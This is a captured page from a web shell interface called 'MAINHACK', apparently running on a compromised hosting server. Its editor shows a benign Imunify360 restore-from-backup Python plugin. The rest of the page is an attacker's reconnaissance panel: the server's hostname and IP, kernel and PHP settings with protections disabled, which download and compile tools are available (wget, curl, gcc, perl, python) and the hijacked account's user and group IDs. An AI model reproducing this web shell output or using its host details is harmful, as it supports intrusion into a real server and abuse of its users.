[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: restore_from_backup.py
File is not writable. Editing disabled.
""" This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <https://www.gnu.org/licenses/>. Copyright © 2019 Cloud Linux Software Inc. This software is also available under ImunifyAV commercial license, see <https://www.imunify360.com/legal/eula> """ from functools import partial from typing import Dict from defence360agent.api import inactivity from defence360agent.contracts.messages import MessageType from defence360agent.contracts.plugins import ( MessageSink, MessageSource, expect, ) from imav.malwarelib.config import MalwareHitStatus from imav.malwarelib.model import MalwareHit from imav.malwarelib.subsys.malware import MalwareAction from defence360agent.utils import Scope from imav.malwarelib.subsys.malware import MalwareActionIm360 _group_by_status = partial(MalwareHit.group_by_attribute, attribute="status") class RestoreFromBackupPlugin(MessageSink, MessageSource): """A plugin that handles RestoreFromBackupTask messages.""" SCOPE = Scope.IM360 def __init__(self): self._loop, self._sink = None, None async def create_sink(self, loop): self._loop = loop async def create_source(self, loop, sink): self._sink = sink @expect(MessageType.RestoreFromBackupTask) async def restore_from_backup(self, message: Dict): """Restores hits in RestoreFromBackupTask message from backup. - sets restore_from_backup_started status for received hits in the database. - successfully restored files are removed from the database. - statuses in the database are reverted from restore_from_backup_started to its original value for files that failed to restore. """ hits = message.get("hits") if not hits: return initiator = message.get("initiator") MalwareHit.set_status( hits, MalwareHitStatus.RESTORE_FROM_BACKUP_STARTED ) with inactivity.track.task("restore_from_backup"): to_restore = {} to_restore.setdefault(initiator, []).extend(hits) restored, failed = [], [] for initiator, init_hits in to_restore.items(): results = await MalwareAction.restore_from_backup( hits=init_hits, initiator=initiator, sink=self._sink, ) restored.extend( [hit for hit, event in results.items() if event.successful] ) failed.extend( [ hit for hit, event in results.items() if not event.successful ] ) MalwareHit.delete_instances(restored) original_status = _group_by_status(failed) for status, failed_hits in original_status.items(): MalwareHit.set_status(failed_hits, status)
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 691.14 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: N/A